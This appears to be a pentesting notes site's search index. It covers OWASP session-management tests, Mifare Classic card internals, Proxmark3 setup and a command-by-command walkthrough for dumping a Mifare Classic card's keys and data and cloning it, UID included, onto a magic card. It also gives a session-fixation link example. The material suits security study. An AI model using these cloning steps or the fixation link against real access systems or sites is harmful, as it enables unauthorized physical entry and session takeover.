        ID Link to Hackinglife Link to OWASP Description 6.2 WSTG-SESS-02 Testing for Cookies Attributes - Ensure that the proper security configuration is set for cookies (HTTPOnly and Secure flag, Samesite=Strict)","tags":["web pentesting","WSTG-SESS-02"]},{"location":"OWASP/WSTG-SESS-03/","title":"Testing for Session Fixation","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.3. Testing for Session Fixation

ID Link to Hackinglife Link to OWASP Description 6.3 WSTG-SESS-03 Testing for Session Fixation - Analyze the authentication mechanism and its flow. - Force cookies and assess the impact. - Check whether the application renews the cookie after successful user authentication.

        Session fixation is a web application security attack where an attacker sets or fixes a user's session identifier (session token) to a known value of the attacker's choice. Subsequently, the attacker tricks the victim into using this fixed session identifier to log in, thereby granting the attacker unauthorized access to the victim's session.

        The attacker obtains a session token issued by the target web application. This can be done in several ways, such as:

        • Predicting or guessing the session token: Some web applications generate session tokens that are easy to predict or lack sufficient randomness.
        • Intercepting the session token: If the application doesn't use secure channels (e.g., HTTPS) to transmit session tokens, an attacker may intercept them as they travel over an insecure network, such as an open Wi-Fi hotspot.

        With a session token in hand, the attacker sets or fixes the victim's session token to a known value that the attacker controls. This value could be one generated by the attacker or an existing valid session token.

        The attacker lures the victim into using the fixed session token to log in to the web application. This can be accomplished through various means:

        • Sending the victim a link that includes the fixed session token.
        • Manipulating the victim into clicking on a specially crafted URL.
        • Social engineering tactics to convince the victim to log in under specific circumstances.

        Once the victim logs in with the fixed session token, the attacker can now hijack the victim's session. The web application recognizes the attacker as the legitimate user since the session token matches what is expected.
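
A typical delivery vector fixes the token directly in a link (a sketch; the PHPSESSID parameter is an assumption, since the cookie name depends on the framework, and the application must accept session IDs from the URL):

# Link sent to the victim; the session ID is chosen by the attacker\nhttp://example.com/login?PHPSESSID=attacker_chosen_value\n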

        ","tags":["web pentesting","WSTG-SESS-03"]},{"location":"OWASP/WSTG-SESS-03/#mitigation","title":"Mitigation","text":"
        • Implementing a session token renewal after a user successfully authenticates.
        • The application should always first invalidate the existing session ID before authenticating a user, and if the authentication is successful, provide another session ID.
        • Prevent \"forced cookies\" with full HSTS adoption.
        ","tags":["web pentesting","WSTG-SESS-03"]},{"location":"OWASP/WSTG-SESS-04/","title":"Testing for Exposed Session Variables","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.4. Testing for Exposed Session Variables

        ID Link to Hackinglife Link to OWASP Description 6.4 WSTG-SESS-04 Testing for Exposed Session Variables - Ensure that proper encryption is implemented (Encryption & Reuse of session Tokens vulnerabilities). - Review the caching configuration. - Assess the channel and methods' security (Send sessionID with GET method ?)","tags":["web pentesting","WSTG-SESS-04"]},{"location":"OWASP/WSTG-SESS-05/","title":"Testing for Cross Site Request Forgery","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.5. Testing for Cross Site Request Forgery

        ID Link to Hackinglife Link to OWASP Description 6.5 WSTG-SESS-05 Testing for Cross Site Request Forgery - Determine whether it is possible to initiate requests on a user's behalf that are not initiated by the user. - Conduct URL analysis, Direct access to functions without any token.

        Cross Site Request Forgery (CSRF) is a type of web security vulnerability that occurs when an attacker tricks a user into performing actions on a web application without their knowledge or consent. A successful CSRF exploit can compromise end user data and operation when it targets a normal user. If the targeted end user is the administrator account, a CSRF attack can compromise the entire web application.

        ","tags":["web pentesting","WSTG-SESS-05"]},{"location":"OWASP/WSTG-SESS-05/#see-my-notes","title":"See my notes","text":"
        • CSRF attack - Cross Site Request Forgery
        ","tags":["web pentesting","WSTG-SESS-05"]},{"location":"OWASP/WSTG-SESS-06/","title":"Testing for Logout Functionality","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.6. Testing for Logout Functionality

        ID Link to Hackinglife Link to OWASP Description 6.6 WSTG-SESS-06 Testing for Logout Functionality - Assess the logout UI. - Analyze the session timeout and if the session is properly killed after logout.","tags":["web pentesting","WSTG-SESS-06"]},{"location":"OWASP/WSTG-SESS-07/","title":"Testing Session Timeout","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.7. Testing Session Timeout

        ID Link to Hackinglife Link to OWASP Description 6.7 WSTG-SESS-07 Testing Session Timeout - Validate that a hard session timeout exists, after the timeout has passed, all session tokens should be destroyed or be unusable.","tags":["web pentesting","WSTG-SESS-07"]},{"location":"OWASP/WSTG-SESS-08/","title":"Testing for Session Puzzling","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.8. Testing for Session Puzzling

        ID Link to Hackinglife Link to OWASP Description 6.8 WSTG-SESS-08 Testing for Session Puzzling - Identify all session variables. - Break the logical flow of session generation. - Check whether the application uses the same session variable for more than one purpose","tags":["web pentesting","WSTG-SESS-08"]},{"location":"OWASP/WSTG-SESS-09/","title":"Testing for Session Hijacking","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.9. Testing for Session Hijacking

        ID Link to Hackinglife Link to OWASP Description 6.9 WSTG-SESS-09 Testing for Session Hijacking - Identify vulnerable session cookies. - Hijack vulnerable cookies and assess the risk level.

        An attacker who gets access to user session cookies can impersonate them by presenting such cookies. This attack is known as session hijacking.

        ","tags":["web pentesting","WSTG-SESS-09"]},{"location":"OWASP/WSTG-SESS-09/#testing","title":"Testing","text":"

        The testing strategy is targeted at network attackers, hence it only needs to be applied to sites without full HSTS adoption (sites with full HSTS adoption are secure, since their cookies are not communicated over HTTP).

We assume we have two testing accounts on the website under test, one to act as the victim and one to act as the attacker. We simulate a scenario where the attacker steals all the cookies which are not protected against disclosure over HTTP, and presents them to the website to access the victim's account. If these cookies are enough to act on the victim's behalf, session hijacking is possible.

Steps for executing this test:

1. Log in to the website as the victim and reach any page offering a secure function requiring authentication.
2. Delete from the cookie jar all the cookies which satisfy any of the following conditions: in case there is no HSTS adoption, the Secure attribute is set; in case there is partial HSTS adoption, the Secure attribute is set or the Domain attribute is not set.
3. Save a snapshot of the cookie jar.
4. Trigger the secure function identified at step 1.
5. Observe whether the operation at step 4 has been performed successfully. If so, the attack was successful.
6. Clear the cookie jar, log in as the attacker and reach the page at step 1.
7. Write in the cookie jar, one by one, the cookies saved at step 3.
8. Trigger again the secure function identified at step 1.
9. Clear the cookie jar and log in again as the victim.
10. Observe whether the operation at step 8 has been performed successfully in the victim's account. If so, the attack was successful; otherwise, the site is secure against session hijacking.

        ","tags":["web pentesting","WSTG-SESS-09"]},{"location":"OWASP/WSTG-SESS-09/#mitigation","title":"Mitigation","text":"
        • Full HSTS adoption.
        ","tags":["web pentesting","WSTG-SESS-09"]},{"location":"OWASP/WSTG-SESS-10/","title":"Testing JSON Web Tokens","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.10. Testing JSON Web Tokens

        ID Link to Hackinglife Link to OWASP Description 6.10 WSTG-SESS-10 Testing JSON Web Tokens - Determine whether the JWTs expose sensitive information. - Determine whether the JWTs can be tampered with or modified.","tags":["web pentesting","WSTG-SESS-10"]},{"location":"RFID/mifare-classic/","title":"Mifare Classic","text":"","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classic_1","title":"Mifare classic","text":"

The MiFare Classic is an NFC chip following the ISO 14443A standard. The memory of this chip (assuming we are talking about the Classic 1K) is divided into 16 sectors of 64 bytes each. Like most, if not all, NFC cards, it also contains a UID and other data. Each sector can contain 2 keys as well as access condition information. All of these sectors can be encrypted with the Crypto1 algorithm to protect the data from being copied. Each key in each sector can be used to open a door (or anything else) in a sequence that goes something like this:

        1. Reader detects NFC card and sends out information to unlock at least 1 sector on the MiFare Classic chip
        2. Assuming the MiFare classic is programmed for this door, it sends back the key and access conditions
        3. The reader validates the key and access conditions it receives and checks if the UID of the key is valid or within a specified range
        4. If everything is in order, the reader opens the door
        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classic-cards","title":"Mifare Classic Cards","text":"
        • Mifare Classic 1K
        • Mifare Classic 4K
        • Mifare Classic EV1

In a Mifare Classic card there are sectors, and each sector contains a number of blocks. Each sector has a sector trailer, a block that controls access to the sector's data: the access conditions (key A, key B and the access bits) are stored in the sector trailer.

Each Mifare tag has a 4-byte UID which is unique and not changeable. Some Mifare cards have a 7-byte UID.

Transport configuration: At chip delivery, all keys are set to 0xFF FF FF FF FF FF (six times FFh) and bytes 6, 7 and 8 are set to 0xFF0780 (see Transport Configuration). Additionally, byte 9 is used for one byte of general-purpose user data; its factory default value is 0x69. Therefore, at chip delivery the sector trailer would be:

Byte:  0  1  2  3  4  5  6  7  8  9  10 11 12 13 14 15
Value: FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF

        Or:

Key A (bytes 0-5): FF FF FF FF FF FF
Access bits (bytes 6-8): FF 07 80
User byte (byte 9): 69
Key B (bytes 10-15): FF FF FF FF FF FF

Transport configuration is the name for the factory default keys and configuration:
• KeyA: 0x FF FF FF FF FF FF (default key; it can never be read).
• KeyB: 0x FF FF FF FF FF FF (default data). KeyB is used as data in the transport configuration because it is readable, so it cannot be used as an authentication key.
• Access Bits: 0xFF0780, meaning:
• KeyA can never be read, but can write (change) itself.
• KeyA can read/write the Access Bits and KeyB.
• Notice that KeyB is readable by KeyA; thus, KeyB cannot be used as an authentication key, but it can be used for general-purpose user data.
• KeyA is allowed to read/write/increment/decrement the data blocks.

        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classics-1k","title":"Mifare Classics 1K","text":"

        Memory Organization:

        • 1024 Bytes
        • Sectors and Blocks:
        • 16 Sectors (0-15).
• 4 Blocks in each Sector
        • 16 Bytes in each Block
        • 2 Keys (A/B) in each Sector
        • Sector Trailer
        • Authentication is required

        Access bits and conditions: Attention: With each memory access the internal logic verifies the format of the access conditions. If it detects a format violation the whole sector is irreversibly blocked.

On chip delivery, the access conditions for the sector trailers and KeyA are predefined as the Transport Configuration. Since KeyB may be read in the transport configuration, it cannot be used as an authentication key, and new cards must be authenticated with KeyA. Since the access bits themselves can also be blocked, special care has to be taken during the personalization of cards.
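
With a Proxmark3 you can inspect a sector trailer before changing anything (a minimal sketch; block 3 is the trailer of sector 0, and the factory default key is assumed):

hf mf rdbl --blk 3 -a -k FFFFFFFFFFFF\n# --blk: block number, -a: authenticate with key A, -k: key to use\n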

        Access conditions of sector trailer:

        Access Conditions of Data Block

The following example analyses the Transport Configuration access bits (0xFF0780):

        • Byte6 = 0xFF
        • Byte7 = 0x07
        • Byte8 = 0x80
        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classic-4k","title":"Mifare Classic 4K","text":"

Memory structure:

        • 4096 Bytes
        • 40 Sectors (0-39)
• 32 Sectors (0-31) have 4 Blocks each
• 8 Sectors have 16 Blocks each
        • Each Sector has Sector Trailer Block
        • Authentication is required
        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#cloning-a-mifare-classic","title":"Cloning a MIFARE classic","text":"

        Proxmark Cheat sheet

        Make sure that it's a MIFARE classic 1K card:

        hf search\n

The last line should return:

        Valid ISO14443A Tag Found - Quitting Search\n

        In this case it\u2019s a Mifare 1k card. Copy the UID of the card, which we\u2019ll need later. From there we can find keys in use by checking against a list of default keys (hopefully one of these has been used):

        hf mf chk --1k -f mfc_default_keys\n

        Results:

        Found valid key:[ffffffffffff]  \n

This shows a key of ffffffffffff, which we can plug into the next command to dump the keys to a file:

        hf mf nested --1k --blk 0 -a -k FFFFFFFFFFFF --dump\n

This dumps the keys from the card into a binary key file (hf-mf-<UID>-key.bin). The output should be something like this:

        [+] Testing known keys. Sector count 16\n[+] Fast check found all keys\n\n[+] found keys:\n\n[+] -----+-----+--------------+---+--------------+----\n[+]  Sec | Blk | key A        |res| key B        |res\n[+] -----+-----+--------------+---+--------------+----\n[+]  000 | 003 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] -----+-----+--------------+---+--------------+----\n[+] ( 0:Failed / 1:Success )\n\n[+] Generating binary key file\n[+] Found keys have been dumped to `/home/ME/hf-mf-<UID>-key.bin`\n[=] --[ FFFFFFFFFFFF ]-- has been inserted for unknown keys where res is 0\n

        Another way is to do an autopwn:

        hf mf autopwn\n

        Now to dump the contents of the card:

        hf mf dump --1k\n

This dumps the data from the card into hf-mf-<UID>-dump.bin. The output should be something like this:

        Using... hf-mf-<UID>-key.bin\n[+] Loaded binary key file `/home/ME/hf-mf-<UID>-key.bin`\n[=] Reading sector access bits...\n[=] .................\n[+] Finished reading sector access bits\n[=] Dumping all blocks from card...\n \ud83d\udd53 Sector...  9 block... 3 ( ok )[#] Can't select card\n[#] Can't select card\n \ud83d\udd51 Sector... 15 block... 1 ( ok )[#] Can't select card\n \ud83d\udd53 Sector... 15 block... 3 ( ok )\n[+] Succeeded in dumping all blocks\n\n[+] time: 9 seconds\n\n\n[=] -----+-----+-------------------------------------------------+-----------------\n[=]  sec | blk | data                                            | ascii\n[=] -----+-----+-------------------------------------------------+-----------------\n[=]    0 |   0 | FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF | .B........]..6..\n[=]      |   1 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   2 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   3 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    1 |   4 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   5 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   6 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   7 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    2 |   8 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   9 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  11 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    3 |  12 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  13 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  14 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  15 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    4 |  16 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  17 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  18 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  19 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    5 |  20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  21 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  22 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  23 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    6 |  24 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  25 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  26 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  27 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    7 |  28 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  29 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 
\n[=]      |  31 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    8 |  32 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  33 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  34 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  35 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    9 |  36 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  37 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  38 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  39 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   10 |  40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  41 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  42 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  43 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   11 |  44 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  45 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  46 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  47 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   12 |  48 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  49 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  51 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   13 |  52 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  53 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  54 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  55 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   14 |  56 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  57 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  58 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  59 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   15 |  60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  61 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  62 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  63 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=] -----+-----+-------------------------------------------------+-----------------\n\n[+] Saved 1024 bytes to binary file `/home/ME/hf-mf-<UID>-dump.bin`\n[+] Saved to json file `/home/ME/hf-mf-<UID>-dump.json`\n

At this point we’ve got everything we need from the card, so we can take it off the reader.

        Now there are two ways to proceed:

        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#way-1-cload","title":"Way 1: cload","text":"

Create an eml file from the previously obtained binary dump file:

# First go to <yourpath>/proxmark/tools/\ncd proxmark/tools/\n\n# Run the script pm3_mfd2eml.py\npython3 ./pm3_mfd2eml.py /home/PATH/hf-mf-<UID>-dump.bin /home/PATH/hf-mf-<UID>-dump.eml\n

        Load the eml file into your magic card:

        hf mf cload -f /home/PATH/hf-mf-<UID>-dump.eml\n
        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#way-2-restore","title":"Way 2: restore","text":"

To copy that data onto a new card, place the magic (Chinese backdoor) card on the Proxmark3:

hf mf restore --1k --uid <UID> -k /home/ME/hf-mf-<UID>-key.bin\n

        This restores the dumped data onto the new card. Now we just need to give the card the UID we got from the original hf search command:

        hf mf csetuid --uid <UID>\n
        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#resources","title":"Resources","text":"

        https://jaymonsecurity.com/seguridad-clonar-tarjeta-proxmark-red-team/

        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-desfire/","title":"Mifare Desfire","text":"","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-desfire/#basic-commands","title":"Basic commands","text":"
        # Recover AIDs by bruteforce\nhf mfdes bruteaid\n
        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/","title":"Installing proxmark3 RDV4.01 in Kali","text":"

        Basic usage

        ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/#preparing-linux","title":"Preparing Linux","text":"

In my case, I will create a virtual environment:

        mkvirtualenv nfc\n

A system upgrade was carried out prior to following these instructions.

Update the package list

        sudo apt-get update\nsudo apt-get upgrade -y\nsudo apt-get auto-remove -y\n

        Install the requirements

        sudo apt-get install --no-install-recommends git ca-certificates build-essential pkg-config libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev liblz4-dev libbluetooth-dev libpython3-dev libssl-dev libgd-dev\n

        Clone the repository:

        git clone https://github.com/RfidResearchGroup/proxmark3.git\n

Check ModemManager. Make sure ModemManager will not interfere; otherwise it could brick your Proxmark3! ModemManager must be removed or disabled.

ModemManager is pre-installed on many Linux distributions, very probably yours as well. It is intended to prepare and configure mobile broadband (2G/3G/4G) devices, whether built-in or dongles. Some of these are serial devices, so when the Proxmark3 is plugged in and a /dev/ttyACM0 appears, ModemManager attempts to talk to it to see whether it is a modem replying to AT commands. Now imagine what happens when you are flashing your Proxmark3 and ModemManager suddenly starts sending bytes to it at the same time: the flashing fails. And if that happens while you are flashing the bootloader, it will take a JTAG device to unbrick the Proxmark3. ModemManager is a threat not only to the Proxmark3 but also to many other embedded devices, such as some Arduino platforms.

        # Solution 1: remove ModemManager\nsudo apt remove modemmanager\n\n# Solution 2: disable ModemManager\nsudo systemctl stop ModemManager\nsudo systemctl disable ModemManager\n
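
Before flashing, it is worth double-checking that ModemManager is really out of the way. A minimal sketch, assuming a systemd-based distribution:

# Both should report that the unit is inactive/disabled (or fail if it was removed)\nsystemctl is-active ModemManager\nsystemctl is-enabled ModemManager\n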

        Troubleshooting issues with ModemManager

Connect your device using the USB cable and check that the Proxmark3 is being picked up by your computer:

        sudo dmesg | grep -i usb\n

        It should show up as a CDC device:

        usb 3-3: Product: proxmark3\nusb 3-3: Manufacturer: proxmark.org\nusb 3-3: SerialNumber: iceman\ncdc_acm 3-3:1.0: ttyACM0: USB ACM device\n

        And a new\u00a0/dev/ttyACM0\u00a0should have appeared:

        ls -la /dev | grep ttyACM0    \n

Get permissions to use /dev/ttyACM0 by adding the current user to the proper groups. This step can be done from the Iceman Proxmark3 repo with:

        make accessrights\n

Then, you need to log out and log in again for your new group membership to be fully effective.

        To test you have the proper read & write rights, plug the Proxmark3 and execute:

        [ -r /dev/ttyACM0 ] && [ -w /dev/ttyACM0 ] && echo ok\n

        It must return ok. Otherwise this means you've got a permission problem to fix.

        ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/#compilation-instructions-for-rdv4","title":"Compilation instructions for RDV4","text":"

The repo defaults to compiling a firmware and client suitable for the Proxmark3 RDV4.

        Get the latest commits:

        cd proxmark3\ngit pull\n

        Clean and compile everything:

        make clean && make -j\n

If you get an error, go to the troubleshooting guide.

Install it, but be careful: if you run

        sudo make install\n

        Then the required files will be installed on your system, by default in\u00a0/usr/local/bin\u00a0and\u00a0/usr/local/share/proxmark3. Maintainers can read\u00a0this doc\u00a0to learn how to modify installation paths via\u00a0DESTDIR\u00a0and\u00a0PREFIX\u00a0Makefile variables.
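
For example, to install under a custom prefix instead of /usr/local, a sketch based on the PREFIX variable mentioned above (/opt/proxmark3 is just an illustrative path):

sudo make install PREFIX=/opt/proxmark3\n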

The commands given in the documentation assume you did the installation step. If you didn't, you'll have to adjust the command paths and file paths accordingly, e.g. calling ./pm3 or client/proxmark3 instead of just pm3 or proxmark3.

In most cases, you can run the following script, which tries to auto-detect the port to use on several OSes:

        pm3-flash-all\n

If it doesn't work, go to the troubleshooting guide.

Run the client. In most cases, you can run the script pm3, which tries to auto-detect the port to use on several OSes.

        ./pm3\n

For other cases, specify the port yourself. For example, for a Proxmark3 connected via USB under Linux (adjust the port for your OS):

        proxmark3 /dev/ttyACM0\n

        or from the local repo

        client/proxmark3 /dev/ttyACM0\n

If all went well, you should get some information about the firmware and memory usage as well as the prompt, something like this:

        [=] Session log /home/iceman/.proxmark3/logs/log_20230208.txt\n[+] loaded from JSON file /home/iceman/.proxmark3/preferences.json\n[=] Using UART port /dev/ttyS3\n[=] Communicating with PM3 over USB-CDC\n\n\n  8888888b.  888b     d888  .d8888b.\n  888   Y88b 8888b   d8888 d88P  Y88b\n  888    888 88888b.d88888      .d88P\n  888   d88P 888Y88888P888     8888\"\n  8888888P\"  888 Y888P 888      \"Y8b.\n  888        888  Y8P  888 888    888\n  888        888   \"   888 Y88b  d88P\n  888        888       888  \"Y8888P\"    [ \u2615 ]\n\n\n [ Proxmark3 RFID instrument ]\n\n    MCU....... AT91SAM7S512 Rev A\n    Memory.... 512 Kb ( 66% used )\n\n    Client.... Iceman/master/v4.16191 2023-02-08 22:54:30\n    Bootrom... Iceman/master/v4.16191 2023-02-08 22:54:26\n    OS........ Iceman/master/v4.16191 2023-02-08 22:54:27\n    Target.... RDV4\n\n[usb] pm3 -->\n

        This\u00a0[usb] pm3 --> \u00a0is the Proxmark3 interactive prompt.

        ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/#configuration-and-verification","title":"Configuration and Verification","text":"

        Verify the status of your installation with:

        script run init_rdv4\n

        To make sure you got the latest sim module firmware:

        hw status\n

        If you get a message such as:

        [#] Smart card module (ISO 7816)\n[#]   version................. vX.XX ( Outdated )\n

Then the version is outdated and you will need to update it. The following command upgrades your device's sim module firmware. Do not turn off your device during the execution of this command! Even though it's a fairly fast command, you may brick the sim module if you interrupt it.

        smart upgrade -f /usr/local/share/proxmark3/firmware/sim014.bin\n\n# or if from local repo\nsmart upgrade -f sim014.bin\n

        You get the following output if the execution was successful:

        [=] --------------------------------------------------------------------\n[!] \u26a0\ufe0f  WARNING - sim module firmware upgrade\n[!] \u26a0\ufe0f  A dangerous command, do wrong and you could brick the sim module\n[=] --------------------------------------------------------------------\n\n[=] firmware file       sim014.bin\n[=] Checking integrity  sim014.sha512.txt\n[+] loaded 3658 bytes from binary file sim014.bin\n[+] loaded 158 bytes from binary file sim014.sha512.txt\n[=] Don't turn off your PM3!\n[+] Sim module firmware uploading to PM3...\n \ud83d\udd51 3658 bytes sent\n[+] Sim module firmware updating...\n[#] FW 0000\n[#] FW 0080\n[#] FW 0100\n[#] FW 0180\n[#] FW 0200\n[#] FW 0280\n[#] FW 0300\n[#] FW 0380\n[#] FW 0400\n[#] FW 0480\n[#] FW 0500\n[#] FW 0580\n[#] FW 0600\n[#] FW 0680\n[#] FW 0700\n[#] FW 0780\n[#] FW 0800\n[#] FW 0880\n[#] FW 0900\n[#] FW 0980\n[#] FW 0A00\n[#] FW 0A80\n[#] FW 0B00\n[#] FW 0B80\n[#] FW 0C00\n[#] FW 0C80\n[#] FW 0D00\n[#] FW 0D80\n[#] FW 0E00\n[+] Sim module firmware upgrade successful    \n

Run the hw status command to verify that the upgrade went well.

        hw status\n
        ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3/","title":"Using Proxmark3 RDV4.01","text":"

        Installation: Installing proxmark3 RDV4.01 in Kali

        ","tags":["pentesting","NFC","pentesting"]},{"location":"RFID/proxmark3/#basic-commands","title":"Basic commands","text":"
        # The prompt will have this appearance\n[usb] pm3 --> \n\n# Display help and commands\nhelp\n\n# Close the client\nquit\n

        To get an overview of the available commands for LF RFID and HF RFID:

